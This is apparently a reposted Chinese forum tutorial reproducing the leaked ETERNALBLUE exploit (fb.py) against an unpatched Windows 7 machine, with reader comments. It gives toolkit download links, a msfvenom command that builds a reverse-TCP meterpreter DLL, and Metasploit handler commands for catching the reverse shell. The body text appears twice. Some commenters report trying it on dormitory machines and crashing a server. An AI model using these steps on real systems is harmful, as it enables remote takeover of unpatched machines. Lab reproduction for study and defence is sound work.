方程式ETERNALBLUE 之fb.py的复现
那会在微信群,9484应大家的建议,写了一篇关于方程式的FB.py复现的一篇文章,这篇文章是9484写的,我只是代发。推给大家,希望能解决大家的困惑,文章写的很清晰,我不多BB了,不然要挨骂。嘿嘿。
十分感谢9484大牛的分享!
0x01.环境简介
攻击机win2003
ip:192.168.1.105
攻击机kali:
ip:192.168.1.106
靶机(被攻击机)window7 x64(未装smb漏洞补丁)
ip:192.168.1.100
0x02.windows2003攻击机
攻击机win2003安装环境:
安装好python后,需要在win2003设置环境变量:
将整个ETERNALBLUE 目录下的 windows拷贝到攻击机win2003上
在windows目录下建立一个文件为:listeningposts
运行phthon fb.py
以下在攻击机win2003上执行fb.py的具体命令重要命令如下,其他命令都用回车执行。
0x03.攻击机kali上
利用msf生成一个dll劫持文件:
将s.dll文件拷贝到windows2003的C盘目录下:
在msf下开启msfpaylod监听:
0x04.接着在windows2003下执行
最后在msf下可以看到成功反弹shell:
doc文档
链接:http://pan.baidu.com/s/1bo2tHuv 密码:hq47
十分感谢9484大牛的分享!
0x01.环境简介
攻击机win2003
ip:192.168.1.105
攻击机kali:
ip:192.168.1.106
靶机(被攻击机)window7 x64(未装smb漏洞补丁)
ip:192.168.1.100
0x02.windows2003攻击机
攻击机win2003安装环境:
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win-amd64-py2.6.exe:
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
方程式ETERNALBLUE 下载地址:
https://codeload.github.com/misterch0c/shadowbroker/zip/master
安装好python后,需要在win2003设置环境变量:
将整个ETERNALBLUE 目录下的 windows拷贝到攻击机win2003上
在windows目录下建立一个文件为:listeningposts
运行phthon fb.py
以下在攻击机win2003上执行fb.py的具体命令重要命令如下,其他命令都用回车执行。
0x03.攻击机kali上
利用msf生成一个dll劫持文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > /opt/s.dll
将s.dll文件拷贝到windows2003的C盘目录下:
在msf下开启msfpaylod监听:
use exploit/multi/handler
set lhost 192.168.1.106
set lport 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
0x04.接着在windows2003下执行
最后在msf下可以看到成功反弹shell:
doc文档
链接:http://pan.baidu.com/s/1bo2tHuv 密码:hq47
评论135次
我把2008打重启了!
那个dane选项是怎么回事,有没有说明什么的
分享很及时,是时候让学校授权安全测试了
N多服务器又要沦陷了
我运行官网的fb.py出错
这个东西弄了好久才成功
环境不好找啊,老win老py
需要的话,我传百度云你下载一下?
谢谢谢谢,实在太nice了昨晚找了一晚,已经找到了,不过还是谢谢!
我帖子上面我写了下载地址的。你没看到么。开头就是
能移植到python2.7么?
不能
昨晚测试宿舍一台win7时,存在漏洞,但是kali的监听老是被中断,啥杀软还是啥玩意
可以尝试NC,这些,方法很多,都尝试下吧
昨晚测试宿舍一台win7时,存在漏洞,但是kali的监听老是被中断,啥杀软还是啥玩意
能移植到python2.7么?
环境不好找啊,老win老py
需要的话,我传百度云你下载一下?
谢谢谢谢,实在太nice了 昨晚找了一晚,已经找到了,不过还是谢谢!
环境不好找啊,老win老py
需要的话,我传百度云你下载一下?
学xi了! 涨姿势了!
环境不好找啊,老win老py
测试成功!
这个教程全面试用下
反弹不回来,有人知道是怎么回事吗?
图文并茂,学xi了
XP按楼主教程测试成功,感谢